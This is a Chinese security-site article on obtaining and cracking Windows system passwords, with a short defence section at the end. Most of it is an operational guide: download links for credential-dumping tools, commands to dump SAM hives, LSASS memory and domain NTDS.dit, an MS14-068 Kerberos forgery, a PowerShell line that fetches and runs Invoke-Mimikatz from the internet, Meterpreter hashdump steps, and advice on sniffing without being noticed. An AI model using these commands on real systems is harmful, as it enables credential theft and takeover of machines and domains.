安基网 首页 安全 系统安全 查看内容

密码安全系列文章之二:物理接触获取并破解windows系统密码

2020-3-25 20:42| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 很多人认为个人计算机比较安全,因为给计算机设置了密码,外人不知道设置的密码,因此也就安全了,其实这里面很很大的误解,个人计算机安全除了设置密码强健程度以外,还需要设置禁用光盘启动,禁止修改BIOS。下面介绍密码相关知识,了解这些将有助于防范黑客攻击和资料外泄。1.2.1Windows密码获取思路 ...

很多人认为个人计算机比较安全,因为给计算机设置了密码,外人不知道设置的密码,因此也就安全了,其实这里面很很大的误解,个人计算机安全除了设置密码强健程度以外,还需要设置禁用光盘启动,禁止修改BIOS。下面介绍密码相关知识,了解这些将有助于防范黑客攻击和资料外泄。

1.2.1Windows密码获取思路

windows系统密码获取有多种方式,下面对获取windows密码的思路进行总结:

1.通过0day直接获取权限,然后通过wce等工具获取明文或者哈希值,比如ms08067,通过溢出直接获取system权限,虽然现在越来越少,但现实中还是存在,比如最近的iis webdav、ms017-010溢出漏洞。

2.通过网站漏洞获取webshell后,通过系统存在漏洞提权,获取权限后再获取系统密码以及哈希值。

3.内网环境可以通过ntscan等工具进行扫描,暴力破解获取。

4.本地物理接触获取。通过livecd、PE盘等工具,启动系统后,直接读取系统文件,将config文件夹全部复制,然后进行哈希值提取并暴力破解之。

1.2.2密码哈希值获取工具

1.gethash

insidepro.com公司早期开发的提取密码工具,最新版本1.6,目前已经停止更新,其工具在saminside中可以获取。

2.gsecdump

gsecdump目前版本为v2.0b5,由于其使用的广泛性,因此被google浏览器以及杀毒软件定义为病毒,官方网站已经不提供下载地址,可以给官方(info@truesec.co)发邮件索取。

3.QuarksPwDump

Quarks PwDump是quarkslab出品的一款用户密码提取开源工具,目前软件最新版本为0.2b,其完整源代码可以从https://github.com/quarkslab/quarkspwdump获取,目前它支持Windows XP/2003/Vista/7/2008版本,且相当稳定。可以抓取windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和Bitlocker。

4.pwdump

Pwdump4.02版本中有两个文件,一个是Pwd4.dll,另外一个是Pwdump4.exe,在早期版本中其dll文件为lsaext.dll。

5.mimikatz

Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具,从早期1.0版本到现在的2.1.1 20180205版本,其功能得到了很大的提升和扩展,最新版下载地址:https://github.com/gentilkiwi/mimikatz/releases/download/2.1.1-20180205/mimikatz_trunk.zip

6. Windows Credentials Editor (WCE)

WCE是一款功能强大的windows平台内网渗透工具,它可以列举登陆会话,并且可以添加、改变和删除相关凭据(例如:LM/NT hashes)。这些功能在内网渗透中能够被利用,例如,在windows平台上执行绕过hash或者从内存中获取NT/LM hashes(也可以从交互式登陆、服务、远程桌面连接中获取)以用于进一步的攻击。,而且体积也非常小,是内网渗透手必备工具。https://www.ampliasecurity.com/research/wce_v1_42beta_x32.zip

https://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip

https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip

7.reg命令导出到文件

通过执行reg命令将sam、system、security文件内容导出到文件。

reg save hklmsam sam.hive

reg save hklmsystem system.hive

reg save hklmsecurity security.hive

8.procdump.exe +mimikatz

procdump.exe -accepteula -ma lsass.exe lsass.dmp //For 32 bits

procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp //For 64 bits

sekurlsa::minidump lsass.dmp

mimikatz # sekurlsa::logonPassword

1.2.3密码获取方法

1.物理接触获取密码法

通过将Ophcrack liveCD(http://ophcrack.sourceforge.net/download.php?type=livecd)、BT5、kali、PE等制作成启动光盘或者启动U盘,启动系统后将系统目录下的config文件下的SAM和SECURITY文件复制出来。通过saminside导入即可进行破解。

2.前面提及工具的密码获取方法

(1)gethash $local

(2)gsecdump –a

(3)QuarksPwDump

QuarksPwDump -dhl 导出本地哈希值

QuarksPwDump –dhdc 导出内存中的域控哈希值

QuarksPwDump -dhd 导出域控哈希值,必须指定NTDS文件

(4)pwd4 /l /o:filename.sam

(5)mimikatz

privilege::debug

sekurlsa::logonpasswords

(6)wce –a

3.域控密码获取

(1)gsecdump法

gsecdump –s >all.txt

(2)QuarksPwDump法

ntdsutil snapshot "activate instance ntds" create quit quit//创建快照

ntdsutil snapshot "mount {GUID}" quit quit // Ntdsutil挂载活动目录的快照

copy MOUNT_POINTwindowsNTDSntds.dit c:ntds.dit //复制快照的本地磁盘

ntdsutil snapshot "unmount {GUID}" quit quit //卸载快照

ntdsutil snapshot "delete {GUID}" quit quit //删除快照

QuarksPwDump.exe --dump-hash-domain --ntds-file c:ntds.dit //提权文件hash值

注意:获取哈希值最好都在同一台服务器上执行,也即将QuarksPwDump.exe直接放在导出ntds.dit服务器上,执行导出命令。如果仅仅将ntds.dit复制后下载本地可能会出现无法读取错误。如果是想下载ntds.dit到本地恢复还需要执行“reg save hklmsystem system.hive”,将system.hive和ntds.dit全部复制到本地进行域控密码获取。网上也曾经出现一个NTDS.dit密码快速提取工具ntdsdump,使用命令来快速提取:

NTDSDump.exe -f ntds.dit -s SYSTEM -o Hash.txt

(3)使用ms14-068漏洞攻击域控服务器获取域控权限

ms14-068.exe -u -p -s –d 生成伪造缓存test.ccache,然后通过mimikatz导入test.ccache:

kerberos::ptc test.ccache

net use命令获取域控权限:

net use A-EE64804.TEST.LOCAL

dir A-EE64804.TEST.LOCALc$

通过前面的方法来获取域控密码。

4.使用winlogonhack获取系统密码

安装winlogonhack记录程序,记录3389登录密码到系统目录下的boot.dat文件。

5使用ps1批量获取windows密码

在Windows2008及以上操作系统中执行命令:

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

注意:获取密码的计算机必须能够访问raw.githubusercontent.com网络,也可以将该ps文件下载到其他地址,然后替换后执行.

6.在msf获取反弹的shell上获取密码。

(1)getuid 获取当前帐号为系统权限,则进行后续操作,否则通过ps命令去获取小于1000以内的pid,执行migrate pid来提升权限后,继续执行后续步骤。

(2)load mimikatz

(3)运行mimikatz下面的凭证获取命令

kerberos 获取网络认证协议凭证,其中可能会有明文密码

msv 获取msv 凭证,其中包含LM和NTLM哈希密码值

wdigest 获取wdigest (摘要式身份验证)凭证,其中可能会有明文密码

(4)还可以执行hashdump来导出系统的哈希密码值

7. iis7配置文件密码读取

mimikatz.exe privilege::debug log "iis::apphost /in:"%systemroot%system32inetsrvconfigapplicationHost.config" /live" exit

8.vpn密码获取

mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit

9.openvpn配置及其密码

发现安装有OpenVPN,可以将其配置文件夹config全部复制到本地,重新覆盖后可以只用其key和密码或者密钥进行登录,如图1所示。

图1复制vpn配置文件


10.windows下浏览器、EMail、远程桌面等密码获取工具

nirsoft 公司(http://www.nirsoft.net/password_recovery_tools.html)提供很多的免费密码获取工具。其所有工具包http://www.nirsoft.net/packages/passrecenc.zip,压缩文件密码:nirsoft123!。

(1)mail密码获取工具mailpv

http://www.nirsoft.net/toolsdownload/mailpv.zip

(2)msn密码获取工具mspass

http://www.nirsoft.net/toolsdownload/ mspass.zip

(3)IE密码获取工具IEpassview,执行效果如图2所示。在内网个人或者服务器上比较有用,可以获取内网一些cms登录记录的密码。http://www.nirsoft.net/toolsdownload/iepv.zip


图2IE密码记录获取

(4)Outlook密码获取工具pst_password

http://www.nirsoft.net/toolsdownload/pstpassword.zip

(5)Foxfire、Chrome、opera浏览器密码获取工具passwordfox和chromepass

http://www.nirsoft.net/toolsdownload/passwordfox.zip

http://www.nirsoft.net/toolsdownload/passwordfox-x64.zip

http://www.nirsoft.net/toolsdownload/chromepass.zip

http://www.nirsoft.net/toolsdownload/operapassview.zip

http://www.nirsoft.net/toolsdownload/webbrowserpassview.zip

(6)无线网络密码获取工具

http://www.nirsoft.net/toolsdownload/wirelesskeyview-x64.zip

http://www.nirsoft.net/toolsdownload/wirelesskeyview.zip

(7)远程桌面密码获取工具rdpv

http://www.nirsoft.net/toolsdownload/rdpv.zip

cmdkey /list 查看3389可信任链接,使用netpass.exe即可知道密码

(8)vnc密码获取工具

http://www.nirsoft.net/toolsdownload/vncpassview.zip

11.数据库密码获取

可以通过分析网站源代码从数据库配置文件例如conn.php、web.config、config.php等文件中获取数据库的账号、密码及服务器IP地址。

12.使用cain等工具进行嗅探

使用cain工具在内网进行精确嗅探,可以嗅探各种密码,但嗅探时间不宜过长,否则因为流量异常容易被发现。

1.2.4物理接触获取密码方法

对于上班的个人计算机,如果在BIOS中未设置安全验证和禁止光盘、网络和U盘启动,入侵者可以通过物理接触计算机,窃取个人计算机资料。

1.获取系统sam和system文件

通过livecd、BT5、Kali、ophcrack等工具盘,启动系统后,将windowssystem32config文件夹下的SAM、SYSTEM和SECURITY文件复制出来,如图3所示。

图3复制sam、security和security文件


2.导入sam和system和文件

使用saminside工具软件,选择导入sam、security和system文件,即从File中选择第一个选项,如图4所示,分别选择sam、security和system文件,其NTLM哈希值就出来了。

图4获取用户密码哈希值


3.使用ophcrack进行密码破解

选择需要破解的密码哈希值,将其导出,然后单独复制需要破解的哈希值,在本例中为:

Administrator:500:E7108C208C467BF789985C6892014BB8:981A05EBA7EA97FA5E776705E985D15A:管理计算机(域::将该值复制到ophcrack中进行破解,如图5所示。

图5使用ophcrack进行暴力破解


4.通过网站在线破解

LM哈希值和NT哈希值复制到网站http://www.objectif-securite.ch/ophcrack.php(改版后新地址为:https://www.objectif-securite.ch/ophcrack)进行破解,如图6所示,直接就出来了,密码为mmd-333cyx。


1.2.5个人计算密码安全防范方法和措施

通过笔者研究,可以通过以下一些方法和措施来加强个人计算机安全。

1.安装杀毒软件,及时更新病毒库,并设置病毒保护密码。无该密码无法清除杀毒软件查杀的病毒。

2.设置强健的密码。目前14位以下的密码,通过ophcrack可以快速进行破解,建议设置超过14位以上的字母大小写+数字+特殊字符的密码,可以是一句话的首字母加大小写加特殊字符加世界等。

3.设置BIOS禁止除硬盘外地其它方式启动,也即禁止从网络、光盘和优盘启动。

4.进入系统设置两道关口,第一道是BIOS进入密码,第二次是系统设置的密码。

作者最新原创图书:

《网络攻防实战研究:MySQL数据库攻击与防御》 京东购买地址:https://item.jd.com/12743208.html

《SQLMAP从入门到精通》 京东购买地址:https://item.jd.com/12671154.html

《Web服务器渗透实战技术》 京东购买地址:https://item.jd.com/12707216.html



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/i6806945556691157508/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部